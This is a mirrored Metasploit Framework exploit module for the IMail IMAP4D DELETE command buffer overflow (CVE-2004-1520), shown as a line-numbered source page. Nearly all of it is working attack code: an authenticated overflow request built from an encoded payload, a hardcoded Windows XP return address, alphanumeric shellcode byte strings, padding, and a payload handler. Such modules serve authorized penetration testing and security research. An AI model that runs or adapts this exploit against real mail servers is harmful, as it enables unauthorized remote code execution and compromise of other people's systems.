Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/imap/imail_delete.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Imap

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'IMail IMAP4D Delete Overflow',

16
        'Description' => %q{

17
          This module exploits a buffer overflow in the 'DELETE'

18
          command of the IMail IMAP4D service. This vulnerability

19
          can only be exploited with a valid username and password.

20
          This flaw was patched in version 8.14.

21
        },

22
        'Author' => [ 'spoonm' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2004-1520'],

26
          [ 'OSVDB', '11838'],

27
          [ 'BID', '11675'],

28
        ],

29
        'Privileged' => true,

30
        'DefaultOptions' => {

31
          'EXITFUNC' => 'thread',

32
        },

33
        'Payload' => {

34
          'Space' => 614,

35
          'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),

36
          'StackAdjustment' => -3500,

37
          'EncoderOptions' =>

38
                        {

39
                          'BufferRegister' => 'EDX',

40
                        }

41
        },

42
        'Platform' => 'win',

43
        'Targets' => [

44
          # alphanum rets :(, will look more into it later

45
          ['Windows XP sp0 comctl32.dll', { 'Ret' => 0x77364650 }],

46
        ],

47
        'DisclosureDate' => '2004-11-12',

48
        'DefaultTarget' => 0,

49
        'Notes' => {

50
          'Reliability' => UNKNOWN_RELIABILITY,

51
          'Stability' => UNKNOWN_STABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56
  end

57


58
  def exploit

59
    connect_login

60


61
    print_status("Sending overflow string...")

62
    req = 'A683 DELETE '

63
    req << payload.encoded

64


65
    # Jump over code

66
    req << "\x74\x32\x75\x30"

67
    req << [target.ret].pack('V')

68
    req << rand_text_alphanumeric(44)

69


70
    # GetEIP code

71
    req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59"

72
    req << "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59"

73


74
    # Alphanumeric jmp back (edx context)

75
    req << "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41"

76
    req << "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50"

77
    req << "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57"

78
    req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a"

79


80
    # Run off the stack, so we don't kill our payload, or something...

81
    req << rand_text_alphanumeric(600)

82


83
    # Terminate the request

84
    req << "\r\n"

85


86
    sock.put(req)

87


88
    handler

89
    disconnect

90
  end

91
end

92


93